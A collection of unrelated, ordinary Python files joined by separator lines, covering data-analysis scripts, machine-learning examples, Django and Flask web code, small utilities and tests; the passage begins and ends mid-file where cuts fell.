    # Fit the vocabulary on train, reuse it for test so columns line up.
    vec = DictVectorizer(dtype=np.int)
    X_train = vec.fit_transform(feature_map).toarray()
    X_test = vec.transform(feature_map_test).toarray()
    print "num train features : %d" % len(X_train.transpose())
    print "num test features : %d" % len(X_test.transpose())
    y_train = np.asarray(y_train)
    labels = np.asarray(labels)
    labels_test = np.asarray(labels_test)
    # Stack [recipe ids; class labels; feature columns] row-wise for saving.
    label_y = np.append([labels], [y_train], axis=0)
    all_data = np.append(label_y, X_train.transpose(), axis=0)
    all_data_test = np.append([labels_test], X_test.transpose(), axis=0)
    # print all_data
    train_file_name = 'nn_train_%d' % len(recipes)
    test_file_name = 'nn_test'
    np.save(train_file_name, all_data)
    np.save(test_file_name, all_data_test)
    print "Saving %s" % train_file_name
    print "Saving %s" % test_file_name
    # print y_train
# Run the preprocessing pipeline only when executed as a script.
if __name__ == "__main__":
    main()
|
import turtle #Import the Turtle graphics library
t = turtle.Pen() #Create the pen (drawing cursor)
turtle.bgcolor('black') #Set the background colour
turtle.title("Titulo") #Set the window title
circulos = 4 #Number of interleaved spirals
colors = ['red', 'yellow', 'blue', 'orange'] #Colours cycled through while drawing
for x in range(360): #Draw 360 arcs
    t.pencolor(colors[x%circulos]) # Cycle through the colour list
    t.circle(x * 3/circulos + x) # Grow the radius each step
    t.left (360/circulos + 1) # Turn 360/circulos plus 1 degree to form the spiral
    t.width (x*circulos/200) # Thicken the stroke as the spiral grows
#tf.estimator is a high-level tensorflow library
#runing training loops
#runing evaluation loops
#managing data set
import tensorflow as tf
import numpy as np
#declare list of features: one numeric feature named "x"
feature_columns = [tf.feature_column.numeric_column("x",shape= [1])]
# Canned linear-regression estimator over that feature column.
estimator = tf.estimator.LinearRegressor(feature_columns = feature_columns)
# Training data follows y = -x + 1; eval data is deliberately noisy.
x_train = np.array([1.,2.,3.,4.,])
y_train = np.array([0.,-1.,-2.,-3.])
x_eval = np.array([2.,4.,8.,1.])
y_eval = np.array([-1.01,-4.1,-7.,0.])
# num_epochs=None repeats forever (training); shuffle only for training.
input_fn = tf.estimator.inputs.numpy_input_fn({"x":x_train},y_train,batch_size = 4,num_epochs=None,shuffle = True)
train_input_fn = tf.estimator.inputs.numpy_input_fn({"x":x_train},y_train,batch_size = 4,num_epochs=1000,shuffle = False)
eval_input_fn = tf.estimator.inputs.numpy_input_fn({"x":x_eval},y_eval,batch_size = 4,num_epochs=1000,shuffle = False)
estimator.train(input_fn = input_fn,steps = 1000)
# Evaluate on both sets to compare train vs. eval loss.
train_metrics = estimator.evaluate (input_fn = train_input_fn)
eval_metrics = estimator.evaluate(input_fn = eval_input_fn)
print("train metrics:%r"%train_metrics)
print("eval metrics:%r"%eval_metrics)
# Enter your code here. Read input from STDIN. Print output to STDOUT
import math

# Read one complex number and print its polar coordinates:
# modulus r = sqrt(a^2 + b^2), then phase phi = atan2(b, a).
z = complex(input())
real_part, imag_part = z.real, z.imag
print(math.hypot(real_part, imag_part))
print(math.atan2(imag_part, real_part))
|
# Visualize and explore data / exploratory data analysis
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
## Import data
hmda_train=pd.read_csv('hmda_train.csv')
# Column groups used throughout the analysis: categorical vs. numeric.
cat_cols = ['msa_md', 'state_code', 'county_code', \
            'lender', 'loan_type', 'property_type', 'loan_purpose', 'occupancy', 'preapproval', \
            'applicant_ethnicity', 'applicant_race', 'applicant_sex', 'co_applicant']
num_cols = ['loan_amount', 'applicant_income', \
            'population', 'minority_population_pct', 'ffiecmedian_family_income', 'tract_to_msa_md_income_pct', 'number_of_owner_occupied_units', 'number_of_1_to_4_family_units']
## Identity row_id
## Label rate_spread
## Accumulate categories
## Recode the categorical features
# Each entry pairs a column name with the integer-code -> label mapping
# (codes follow the HMDA public data dictionary).
code_list = [
    ['loan_type',
     { 1 : 'Conventional',
       2 : 'FHA-insured',
       3 : 'VA-guaranteed',
       4 : 'FSA/RHS' } ],
    ['property_type',
     { 1 : '1-4-family',
       2 : 'Manufactured housing',
       3 : 'Multifamily' } ],
    ['loan_purpose',
     { 1 : 'Home purchase',
       2 : 'Home improvement',
       3 : 'Refinancing' } ],
    ['occupancy' ,
     { 1 : 'Owner-occupied',
       2 : 'Not owner-occupied',
       3 : 'Not applicable' } ],
    ['preapproval',
     { 1 : 'Requested',
       2 : 'Not requested',
       3 : 'Not applicable' } ],
    ['applicant_ethnicity',
     { 1 : 'Hispanic or Latino',
       2 : 'Not Hispanic or Latino',
       3 : 'Not provided',
       4 : 'Not applicable' } ],
    ['applicant_race',
     { 1 : 'American Indian or Alaska Native',
       2 : 'Asian',
       3 : 'Black or African American',
       4 : 'Native Hawaiian or Other Pacific Islander',
       5 : 'White',
       6 : 'Not provided',
       7 : 'Not applicable' } ],
    ['applicant_sex',
     { 1 : 'Male',
       2 : 'Female',
       3 : 'NA',
       4 : 'Not applicable' } ]
]
# Replace the integer codes with their human-readable labels in place.
for col_dic in code_list:
    col = col_dic[0]
    dic = col_dic[1]
    hmda_train[col] = [dic[x] for x in hmda_train[col]]
print(hmda_train.head())
#####################################################################
## Explore the data
print(hmda_train.head())
print(hmda_train.dtypes)
# Summary statistics for each numeric column and for the label.
for column in num_cols:
    print(hmda_train[column].describe())
print(hmda_train['rate_spread'].describe())
## Compute and display a frequency table
def count_unique(hmda_train, cols):
    """Print a frequency table for each column in *cols*: once ordered by
    count (pandas default) and once ordered by category value.
    """
    for col in cols:
        print('\n' + 'For column ' + col)
        # Compute value_counts once; the original recomputed it for each print.
        counts = hmda_train[col].value_counts()
        print(counts)
        print(counts.sort_index())
count_unique(hmda_train, cat_cols + ['rate_spread'])
## Category columns with some categories having few distributions
## 'county_code', 'lender'
## 'msa_md', 'state_code' ???
# Drop high-cardinality columns (county_code, lender) from the categorical set.
cat_cols = ['msa_md', 'state_code', 'loan_type', 'property_type', 'loan_purpose', 'occupancy', 'preapproval', \
            'applicant_ethnicity', 'applicant_race', 'applicant_sex', 'co_applicant']
## Treat outliers
## 'rate_spread' = 99 (3) or <= 32
#hmda_outliers = hmda_train.loc[hmda_train['rate_spread'] == 99. ]
# Inspect the rows that will be treated as label outliers (rate_spread >= 9).
hmda_outliers = hmda_train.loc[hmda_train['rate_spread'] >= 9. ]
print(hmda_outliers.shape)
#for col in hmda_outliers.columns:
#    print(hmda_outliers[col])
#hmda_train.loc[hmda_train['rate_spread'] == 99, 'rate_spread'] = np.nan
# Null out the outlier labels, then drop those rows entirely.
hmda_train.loc[hmda_train['rate_spread'] >= 9, 'rate_spread'] = np.nan
hmda_train.dropna(axis = 0, inplace = True)
print(hmda_train.shape)
## Visualizing data
## Visualizing distributions (1D)
## * Bar charts
def plot_bars(hmda_train, cols):
    """Draw one bar chart of category counts for each column in *cols*."""
    for col in cols:
        figure = plt.figure(figsize=(6,6))  # define plot area
        axis = figure.gca()  # define axis
        # Bar chart of the per-category counts for this column.
        hmda_train[col].value_counts().plot.bar(ax=axis, color='blue')
        axis.set_title('Counts by ' + col)
        axis.set_xlabel(col)
        axis.set_ylabel('Counts')
        plt.show()
#plot_bars(hmda_train, cat_cols)
## * Histograms
def plot_histogram(hmda_train, cols, bins = 10):
    """Draw a histogram (bins configurable) for each numeric column in *cols*."""
    for column in cols:
        figure = plt.figure(figsize=(6,6))
        axis = figure.gca()
        hmda_train[column].plot.hist(ax=axis, bins=bins)
        axis.set_title('Histogram of ' + column)
        axis.set_xlabel(column)
        axis.set_ylabel('Counts')
        plt.show()
#plot_histogram(hmda_train, num_cols)
## * KDE (kernel density estimation) using Seaborn
def plot_density_hist(hmda_train, cols, bins = 10, hist = False):
    """Draw a KDE plot (with rug marks, optionally a histogram) per column in *cols*."""
    for column in cols:
        sns.set_style("whitegrid")
        # hist=False -> density curve only; hist=True overlays the histogram.
        sns.distplot(hmda_train[column], bins=bins, rug=True, hist=hist)
        plt.title('Histogram of ' + column)
        plt.xlabel(column)
        plt.ylabel('Counts')
        plt.show()
## * Histograms and KDE
#plot_density_hist(hmda_train, num_cols, bins = 20, hist = True)
## Two dimensional plots
## Scatter
def plot_scatter(hmda_train, cols, col_y = 'rate_spread'):
    """Scatter-plot *col_y* against each column in *cols*."""
    for column in cols:
        figure = plt.figure(figsize=(7,6))
        axis = figure.gca()
        hmda_train.plot.scatter(x=column, y=col_y, ax=axis)
        axis.set_title('Scatter plot of ' + col_y + ' vs. ' + column)
        axis.set_xlabel(column)
        axis.set_ylabel(col_y)
        plt.show()
#plot_scatter(hmda_train, num_cols)
## Check colinear relation
## Deal with overplotting
## * Transparency
def plot_scatter_t(hmda_train, cols, col_y = 'rate_spread', alpha=1.0):
    """Scatter-plot *col_y* vs. each column with point transparency *alpha* to ease overplotting."""
    for column in cols:
        figure = plt.figure(figsize=(7,6))
        axis = figure.gca()
        hmda_train.plot.scatter(x=column, y=col_y, ax=axis, alpha=alpha)
        axis.set_title('Scatter plot of ' + col_y + ' vs. ' + column)
        axis.set_xlabel(column)
        axis.set_ylabel(col_y)
        plt.show()
#plot_scatter_t(hmda_train, num_cols, alpha = 0.2)
## * Countour plots / 2d density plots
def plot_density_2d(hmda_train, cols, col_y = 'rate_spread', kind = 'kde'):
    """Draw a 2-D joint plot (default KDE contours) of *col_y* vs. each column."""
    for column in cols:
        sns.set_style("whitegrid")
        sns.jointplot(column, col_y, data=hmda_train, kind=kind)
        plt.xlabel(column)
        plt.ylabel(col_y)
        plt.show()
# Render the 2-D density plots for every numeric column against rate_spread.
plot_density_2d(hmda_train, num_cols)
## Relation between categorical and numeric variables
## * Box plots
def plot_box(hmda_train, cols, col_y = 'rate_spread'):
    """Draw a box plot of *col_y* grouped by each categorical column in *cols*."""
    for column in cols:
        sns.set_style("whitegrid")
        sns.boxplot(column, col_y, data=hmda_train)
        plt.xlabel(column)
        plt.ylabel(col_y)
        plt.show()
#plot_box(hmda_train, cat_cols)
## * Violine plots
def plot_violin(hmda_train, cols, col_y = 'rate_spread'):
    """Draw a violin plot of *col_y* grouped by each categorical column in *cols*."""
    for column in cols:
        sns.set_style("whitegrid")
        sns.violinplot(column, col_y, data=hmda_train)
        plt.xlabel(column)
        plt.ylabel(col_y)
        plt.show()
plot_violin(hmda_train, cat_cols)
## Additional dimensions
# Persist the cleaned frame for the next stage of the pipeline.
hmda_train.to_csv('hmda_train_pre1.csv', index=False)
|
"""
Sebastian Raschka 2014-2016
Python Progress Indicator Utility
Author: Sebastian Raschka <sebastianraschka.com>
License: BSD 3 clause
Contributors: https://github.com/rasbt/pyprind/graphs/contributors
Code Repository: https://github.com/rasbt/pyprind
PyPI: https://pypi.python.org/pypi/PyPrind
"""
import sys
import time
import pyprind
n = 100  # number of progress-bar iterations per test
sleeptime = 0.02  # simulated work per iteration, in seconds
def test_basic_percent():
    """Drive ProgPercent through a full run with default settings."""
    indicator = pyprind.ProgPercent(n)
    for _ in range(n):
        time.sleep(sleeptime)
        indicator.update()
def test_stdout():
    """Run the indicator against an explicit stdout stream."""
    indicator = pyprind.ProgPercent(n, stream=sys.stdout)
    for _ in range(n):
        time.sleep(sleeptime)
        indicator.update()
def test_generator():
    """Exercise the generator wrapper form of the percentage indicator."""
    for _ in pyprind.prog_percent(range(n), stream=sys.stdout):
        time.sleep(sleeptime)
def test_monitoring():
    """Run with monitor=True and print the collected resource stats."""
    indicator = pyprind.ProgPercent(n, monitor=True)
    for _ in range(n):
        time.sleep(sleeptime)
        indicator.update()
    print(indicator)
def test_item_tracking():
    """Attach a per-iteration item id (a fake file name) to each update."""
    items = ['file_%s.csv' % i for i in range(0, n)]
    indicator = pyprind.ProgPercent(len(items))
    for item in items:
        time.sleep(sleeptime)
        indicator.update(item_id=item)
def test_force_flush():
    """Force a stream flush on every update call."""
    indicator = pyprind.ProgPercent(n)
    for _ in range(n):
        time.sleep(sleeptime)
        indicator.update(force_flush=True)
def test_update_interval():
    """Run with a coarser redraw interval (every 4 updates)."""
    indicator = pyprind.ProgPercent(n, update_interval=4)
    for _ in range(n):
        time.sleep(sleeptime)
        indicator.update()
if __name__ == "__main__":
    # The original repeated the same three-line banner block seven times;
    # drive it from a (title, test) table instead.  Order is unchanged.
    suite = [
        ('Testing Basic Percentage Indicator', test_basic_percent),
        ('Testing stdout Stream', test_stdout),
        ('Testing Percentage Indicator Generator', test_generator),
        ('Testing monitor function', test_monitoring),
        ('Testing Item Tracking', test_item_tracking),
        ('Testing Force Flush', test_force_flush),
        ('Testing Update Interval', test_update_interval),
    ]
    for title, test in suite:
        print('\n%s' % (80 * '='))
        print('%s\n' % (80 * '='))
        print('%s\n' % title)
        test()
|
from .base import *
import os
import raven
# Production settings: HTTPS everywhere, S3-backed static/media files,
# Sentry (raven) error reporting and Opbeat APM.
DEBUG = False
ALLOWED_HOSTS = ['comunidadbiblicadefe.herokuapp.com','comunidadbiblicadefe.org', 'www.comunidadbiblicadefe.org', 'production.comunidadbiblicadefe.org']
# HTTPS CONFIG
#SECURE_SSL_REDIRECT = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# HSTS CONFIG
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_HSTS_SECONDS = 31536000
# COOKIE SECURE CONFIG
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_CONTENT_TYPE_NOSNIFF = True
INSTALLED_APPS += (
    'storages',
    'raven.contrib.django.raven_compat',
    'opbeat.contrib.django',
)
RAVEN_CONFIG = {
    'dsn': os.environ.get('DJANGO_SENTRY_DSN'),
    # If you are using git, you can also automatically configure the
    # release based on the git info.
}
# DATABASE CONFIG
DATABASES = dict(default=dj_database_url.config(default=os.environ.get('DATABASE_URL')))
# S3 AWS CONFIG
AWS_STORAGE_BUCKET_NAME = 'comunidadbf'
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')
AWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME
STATICFILES_LOCATION = 'static'
STATICFILES_STORAGE = 'CBF.custom_storages.StaticStorage'
# NOTE: the original assigned STATIC_URL twice; the first (location-less)
# assignment was dead code and has been removed.
STATIC_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, STATICFILES_LOCATION)
MEDIAFILES_LOCATION = 'media'
MEDIA_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, MEDIAFILES_LOCATION)
DEFAULT_FILE_STORAGE = 'CBF.custom_storages.MediaStorage'
# GOOGLE ANALYTICS CONFIG
GOOGLE_ANALYTICS_PROPERTY_ID = os.environ.get('GOOGLE_ANALYTICS_ID')
GOOGLE_ANALYTICS_SITE_SPEED = True
# OPBEAT CONFIG
MIDDLEWARE_CLASSES += (
    'opbeat.contrib.django.middleware.OpbeatAPMMiddleware',
)
OPBEAT = {
    'ORGANIZATION_ID': os.environ.get('DJANGO_OPBEAT_ORGANIZATION_ID'),
    'APP_ID': os.environ.get('DJANGO_OPBEAT_APP_ID'),
    'SECRET_TOKEN': os.environ.get('DJANGO_OPBEAT_SECRET_TOKEN'),
}
|
from flask import Blueprint, g
# Blueprint shared by the view modules below.
bp = Blueprint('bp', __name__)
# Imported at the bottom (after bp exists) so auth/main/events can import
# `bp` from this package without creating a circular import.
from . import auth
from . import main
from . import events
|
# /usr/bin/env python
# -*- coding:utf-8 -*-
class Stack:
    """A minimal LIFO stack backed by a Python list (top of stack = end of list)."""

    def __init__(self):
        self.items = []

    def size(self):
        """Return the number of stacked items."""
        return len(self.items)

    def push(self, value):
        """Place *value* on top of the stack."""
        self.items.append(value)

    def pop(self):
        """Remove and return the top item (raises IndexError when empty)."""
        return self.items.pop()

    def is_empty(self):
        """Return True when the stack holds no items."""
        # Idiomatic truthiness test instead of comparing against [].
        return not self.items

    def peek(self):
        """Return the top item without removing it."""
        # Negative indexing instead of items[len(items) - 1].
        return self.items[-1]
def coverter(num, base):
    """Convert non-negative integer *num* to its digit string in *base* (2..16).

    Fixes in this revision: the per-digit debug print (which polluted stdout)
    is removed, the builtin name ``str`` is no longer shadowed, and 0 now
    converts to '0' instead of the empty string.
    """
    digits = '0123456789ABCDEF'
    if num == 0:
        return '0'
    # A plain list works as the remainder stack: append = push, pop = pop.
    remainders = []
    while num > 0:
        remainders.append(num % base)
        num //= base
    result = ''
    # Pop remainders in reverse to emit the most significant digit first.
    while remainders:
        result += digits[remainders.pop()]
    return result
if __name__ == '__main__':
    # Demo: 34 in base 16 is '22'.
    res = coverter(34, 16)
    print('res:', res)
|
# coding: utf-8
# Exercise Set 2, Question 4
# In[3]:
import numpy as np
import matplotlib.pyplot as plt
from numpy import random as rn
# In[111]:
# Monte-Carlo estimate of the divergence probability of an Euler-Maruyama
# discretised logistic SDE dX = X(1-X)dt + sigma dW, as a function of sigma.
# NOTE(review): np.linspace's third argument (num) must be an int in modern
# NumPy; (0.6-0.1)/0.02+1 is a float and will raise a TypeError there —
# wrap with int(round(...)) if upgrading. TODO confirm target NumPy version.
sigma=np.linspace(0.1, 0.6,(0.6-0.1)/0.02+1)
prob=np.zeros(len(sigma))
Tmax=10
N=200
h=Tmax/N
t=np.linspace(0, Tmax,Tmax/h+1)
M=10000
# One matrix of standard-normal increments shared across all sigma values.
Z=rn.randn(M,N)
# NOTE(review): range(0, len(sigma)-1) skips the last sigma; the plots below
# also drop the last entry with [:-1], so this appears deliberate.
for k in range(0,len(sigma)-1):
    X=(np.zeros((M,N+1)))
    X[:,0]=X[:,0]+0.5
    sig=sigma[k]
    for j in range(0,M):
        for i in range(0,N):
            # Cap trajectories at 10 and treat them as diverged thereafter.
            if (np.abs(X[j,i])<10):
                X[j,i+1]=X[j,i]+h*X[j,i]*(1-X[j,i])+sig*np.sqrt(h)*Z[j,i];
            else:
                X[j,i+1]=10;
    # Fraction of paths that hit the cap by time Tmax.
    prob[k]=np.sum(X[:,N]==10)/M;
plt.plot(sigma[:-1],prob[:-1])
#We expect the probability of divergence to increase with sigma -
#higher fluctuations gives more chance of divergence.
# In[116]:
plt.plot(sigma[:-1],prob[:-1])
# In[92]:
# Flatten the last simulated trajectory matrix (X holds only the final k).
X=np.concatenate( X, axis=0 )
plt.show()
|
from django.contrib import admin
from data_show import models
# Register your models here.
# Global admin-site tweaks: placeholder for empty values, and cap on
# the "show all" list size.
admin.site.empty_value_display = 'Unknown'
admin.site.list_max_show_all = 10
# inline and admin model for Club
class FilesInline(admin.TabularInline):
    # Files attached to a Club, edited inline; no blank extra rows.
    model = models.File
    extra = 0
@admin.register(models.Club)
class ClubAdmin(admin.ModelAdmin):
    """Admin page for clubs: date drill-down, summary columns, inline files."""
    date_hierarchy = 'create_date'
    list_display = (
        'name',
        'source',
        'club_head',
    )
    # Derived date field; shown but not editable.
    readonly_fields = ('date_ymd',)
    inlines = [
        FilesInline,
    ]
@admin.register(models.File)
class FileAdmin(admin.ModelAdmin):
    # Default admin behaviour is sufficient for File.
    pass
# inlines and admin model for Student
class ContactInline(admin.TabularInline):
    # Contact rows edited inline on the Student page; one blank extra row.
    model = models.Contact
    extra = 1
class ClubLeaderInline(admin.TabularInline):
    # Clubs this student leads (Club.club_head FK distinguishes this
    # inline from ClubManagerInline, which uses Club.manager).
    model = models.Club
    verbose_name = 'club to lead'
    fields = ('name', 'source')
    fk_name = 'club_head'
    extra = 0
class ClubManagerInline(admin.TabularInline):
    # Clubs this student manages (via the Club.manager FK).
    model = models.Club
    verbose_name = 'club to manage'
    fields = ('name', 'source')
    fk_name = 'manager'
    extra = 0
@admin.register(models.Student)
class StudentAdmin(admin.ModelAdmin):
    """Admin page for students: contact columns, grouped edit form,
    status filter, and inlines for led/managed clubs and contacts."""
    list_display = (
        'full_name',
        'email',
        'telephone',
    )
    # Form layout: paired name and contact fields on shared rows.
    fields = (
        'portrait',
        ('first_name', 'last_name'),
        ('email', 'telephone'),
        'status',
    )
    list_filter = ('status',)
    inlines = [
        ClubLeaderInline,
        ClubManagerInline,
        ContactInline,
    ]
|
import time
import ini_files.ini as ini
import main_page.xml_requests.xml_operations as my_xml
import logging
from xml.etree import ElementTree as et
from main_page.client import Client
from db_operations.db_requests import get_user_fp_code_from_idn as get_fp_code
from prettytable import PrettyTable
LOG_FORMAT = "%(asctime)s [%(levelname)s]\t [%(name)s]\t %(message)s"
# NOTE: configuring logging at import time (filemode="w" truncates the log)
# is a module-level side effect of importing this file.
logging.basicConfig(filename="logs/request.log", format=LOG_FORMAT, datefmt='%H:%M:%S', filemode="w", level=logging.INFO)
log = logging.getLogger("coy_operation")
XML_FILE = 'xml_requests/COY_find_info.xml'  # request template, rewritten per call
PATH_INI = "connections.ini"  # connection parameters (COY section)
def __create_xml_coy():
    """Rewrite the request XML with the current client's bank code and a fresh timestamp."""
    current_time = time.strftime('%Y%m%d%H%M%S')
    user = Client()
    idn = user.set_idn()
    fp_code = get_fp_code(idn)
    try:
        tree = et.parse(XML_FILE)
        tree.find('.//TerminalTime').text = current_time
        tree.find('.//BankId').text = fp_code
        # Write back through the same constant we parsed from.  The original
        # hard-coded a second copy of the path with a backslash separator,
        # which only worked on Windows and could drift from XML_FILE.
        tree.write(XML_FILE)
    except FileNotFoundError:
        # Log a real message (the original passed the exception class itself).
        log.exception("Request template %s not found", XML_FILE)
def __get_url_coy():
    """Build the COY service URL from the [COY] section of the ini file.

    Returns an empty string when the parameters cannot be read.
    """
    url = ""
    try:
        parameters = ini.get_config_parameters(PATH_INI, 'COY')
        server = parameters[1]
        port = parameters[2]
        sid = parameters[3]
        url = 'http://' + server + ':' + port + sid
        log.info("Сформировали url для отправки запроса")
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # are not swallowed; the failure is still logged and "" returned.
        log.exception("Формирование url. Не смогли считать параметры")
    return url
def send_coy_request():
    """Build the request XML and URL, send the COY request, and print the raw response."""
    __create_xml_coy()
    url = __get_url_coy()
    xml = my_xml.xml_read(XML_FILE)
    response = my_xml.xml_request_coy(url, xml)
    # The raw XML response is printed; the pretty-table rendering below is
    # currently disabled.
    print(response)
    # user_parameters = parse_response_coy(response)
    # user_table = PrettyTable()
    # column_names = ["Параметр", "Значение"]
    # user_table.add_column(column_names[0], ["Id", "FIO", "Address", "Phone", "Email", "DateOfBirth", "Sex", "BankId",
    #                                         "PersonalNo", "Document", "Options"])
    # second_column = []
    # for i in user_parameters:
    #     second_column.append(i)
    # user_table.add_column(column_names[1], second_column)
    # print(user_table)
    log.info("Вывели инфу о клиенте")
    return response
# def parse_response_coy(response):
# """
# вывод ответа из СОУ в читаемый вид
# :param response: xml
# :return: преобразованная инфа из СОУ
# """
# xml = et.fromstring(response)
# Id = xml.find('.//Id').text
# FIO = xml.find('.//FIO').text
# Address = xml.find('.//Address').text
# Phone = xml.find('.//Phone').text
# try:
# Email = xml.find('.//Email').text
# except:
# Email = "no email"
# DateOfBirth = xml.find('.//DateOfBirth').text
# Sex = xml.find('.//Sex').text
# BankId = xml.find('.//BankId').text
# PersonalNo = xml.find('.//PersonalNo').text
# Document = xml.find('.//Document').text
# try:
# Options = xml.find('.//Options').text
# except:
# Options = "no options"
#
# user = [Id, FIO, Address, Phone, Email, DateOfBirth, Sex, BankId, PersonalNo, Document, Options]
# log.info("Преобразовали ответ из СОУ в нормальный вид")
# return user
|
# Implemented with yield (generator)
def fib(n):
    """Yield n terms of the sequence 1, 2, 3, 5, 8, ...

    Note: the swap happens before the yield, so the classic leading
    1, 1 pair of the Fibonacci sequence collapses into a single 1.
    """
    previous, current = 0, 1
    for _ in range(n):
        previous, current = current, previous + current
        yield current
# print(type(fib(8)))
# for i in fib(8):
#     print(i)
# g = fib(8)
# print(next(g))
# print(next(g))
# print(next(g))
# print(next(g))
|
from rv.modules import Behavior as B
from rv.modules import Module
from rv.modules.base.ctl2note import BaseCtl2Note
class Ctl2Note(BaseCtl2Note, Module):
    # This module emits note events (it maps a controller value to a note),
    # so it declares the sends_notes behavior.
    behaviors = {
        B.sends_notes,
    }
|
import torch
import numpy as np
import math
# Fold each 8-column row of (data1 + data2) into a single weighted number.
data1 = np.array([
    [21966000, 0, 0, 0, 0, 0, 0, 0],
    [23447000, 0, 0, 0, 0, 0, 0, 0],
    [20154000, 0, 0, 0, 0, 0, 0, 0]])
data2 = np.array([
    [0, 8, 8, 4, 2, 4, 2, 7],
    [0, 0, 2, 2, 1, 1, 3, 6],
    [0, 5, 2, 1, 4, 6, 1, 8]])
data3 = data1 + data2
# Positional weight applied to each of the 8 columns.
weights = (1, 100, 10, 1, 0.1, 0.01, 0.001, 0.0001)
data4 = []
for row in data3:
    combined = sum(value * weight for value, weight in zip(row, weights))
    data4.append(round(combined, 4))
print(data4)
|
from django.shortcuts import render, reverse
from django.views import generic
from .forms import AMSModelForm
from .models import AMS
from users.mixins import SuperuserAndLoginRequiredMixin, ModeratorAndLoginRequiredMixin, GuestMixin
class AMSListView(SuperuserAndLoginRequiredMixin, generic.ListView):
    # Superuser-only list of all AMS records.
    template_name = "ams/ams_list.html"
    queryset = AMS.objects.all()
    context_object_name = "ams_objects"
class AMSDetailView(generic.DetailView):
    # NOTE(review): unlike the other AMS views, this one carries no access
    # mixin — confirm it is intentionally reachable without superuser login.
    template_name = "ams/ams_detail.html"
    queryset = AMS.objects.all()
    context_object_name = "ams"
class AMSCreateView(SuperuserAndLoginRequiredMixin, generic.CreateView):
    # Superuser-only create form; returns to the list on success.
    template_name = "ams/ams_create.html"
    form_class = AMSModelForm
    def get_success_url(self):
        """Redirect back to the AMS list after a successful create."""
        return reverse("ams:ams-list")
class AMSUpdateView(SuperuserAndLoginRequiredMixin, generic.UpdateView):
    # Superuser-only edit form; returns to the list on success.
    template_name = "ams/ams_update.html"
    queryset = AMS.objects.all()
    form_class = AMSModelForm
    def get_success_url(self):
        """Redirect back to the AMS list after a successful update."""
        return reverse("ams:ams-list")
class AMSDeleteView(SuperuserAndLoginRequiredMixin, GuestMixin, generic.DeleteView):
    # Superuser-only delete confirmation (GuestMixin additionally applied).
    template_name = "ams/ams_delete.html"
    queryset = AMS.objects.all()
    def get_success_url(self):
        """Redirect back to the AMS list after a successful delete."""
        return reverse("ams:ams-list")
|
#coding:utf-8
# 读取XML文件
import os
import xml.etree.ElementTree as ET
# from xml.etree.ElementTree import parse, Element
def get_xml_info(path):
    """Parse every annotation .xml file found directly in *path*.

    Returns (fnames, all_boxes): the <filename> text of each annotation,
    and — per file — a list of integer coordinate lists, one per <bndbox>.
    """
    fnames = []
    all_boxes = []
    for entry in os.listdir(path):
        # if entry[-5] == '6' and entry[-3:] == 'xml':
        if not entry.endswith('xml'):
            continue
        root = ET.parse(os.path.join(path, entry)).getroot()
        # print("fname: ", root.find('filename').text)
        fnames.append(root.find('filename').text)
        boxes = []
        for obj in root.iter('object'):
            for bndbox in obj.iter('bndbox'):
                boxes.append([int(child.text) for child in bndbox])
        all_boxes.append(boxes)
    return fnames, all_boxes
if __name__ == '__main__':
    # Placeholder entry point; the XML reader is exercised from elsewhere.
    print('???')
#####################################################################
import json
def get_json(filename):
    """Load *filename* as JSON and print it along with a couple of probes."""
    with open(filename, 'r') as load_f:
        load_dict = json.load(load_f)
    print(load_dict)
    print(len(load_dict))
    # NOTE(review): assumes the document is a list with at least 4 elements
    # whose 4th element is itself indexable — verify against the input files.
    print(load_dict[3][2])
    # load_dict['smallberg'] = [8200, {1: [['Python', 81], ['shirt', 300]]}]
    # print(load_dict)
    # NOTE(review): the dumps result is discarded; this only checks the data
    # is serializable with sorted keys.
    json.dumps(load_dict, sort_keys=True)
def findfile():
    """Run get_json on every .json file in the current working directory."""
    for entry in os.listdir('.'):
        if entry.endswith('.json'):
            print(entry)
            get_json(entry)
#####################################################################
import csv
# Dump a TensorBoard-exported accuracy CSV: skip the header row, print the rest.
with open('run_nomix_cifar100_mute_with_xavier_logs-tag-Test_1001_val_acc.csv') as f:
    f_csv = csv.reader(f)
    headers = next(f_csv)
    # print(headers)
    for row in f_csv:
        print(row)
# if __name__ == '__main__':
#     findfile()
# function to read cog files
# Marcos van Dam
# Modified March 2005 to use lun, rather than a fixed value
# Modified Sept 2006 for the NGWFC
# To python 3.0 Elena Manjavacas April 2020
import numpy as np
import os.path
import matplotlib.pyplot as plt
def readcog(filename):
    """Read a centroid-origin (cog) offsets file as float32 and re-save it as text.

    Looks for *filename* first as given, then under the cdcog directory.
    Returns the offsets array (or the initial zeros array when not found).
    """
    offsets = np.zeros(608)  # returned unchanged when the file is missing
    cdcog='/local/kroot/rel/ao/qfix/data/ControlParms/CentOrigin/'
    tmp0 = filename
    tmp = os.path.isfile(tmp0)
    print('File found? =',tmp)
    if tmp == False:
        # Fall back to the standard cog directory.
        tmp0 = cdcog+filename
        tmp = os.path.isfile(tmp0)
        print('File found in path '+cdcog+'? = ' ,tmp)
        if tmp == False:
            print('File '+filename+' not found, returning')
        else:
            fname = tmp0
            # NOTE(review): offset=1 skips a single leading byte — confirm the
            # file format really has a 1-byte header (requires NumPy >= 1.17).
            offsets = np.fromfile(fname, dtype='f', offset=1)
            # NOTE(review): 'new_'+fname prepends to the full absolute path,
            # producing 'new_/local/...'; likely intended to prefix only the
            # basename — confirm.
            np.savetxt('new_'+fname, offsets)
            print('File written in path '+ cdcog)
            return offsets
    else:
        fname = tmp0
        offsets = np.fromfile(fname, dtype='f', offset=1)
        plt.plot(offsets)
        np.savetxt('new_'+fname, offsets)
        print('File '+ filename +' written')
        return offsets
|
from pyspark.sql import SparkSession
from pyspark.sql.types import *
from mine import killer
def main():
    """
    Fill in this function.
    1. Write a function in a separate file that will be used in a DataFrame map operation.
    2. Create a dataframe with words.
    3. Use function for map operation.
    NOTE: Use Lambdas over new functions.
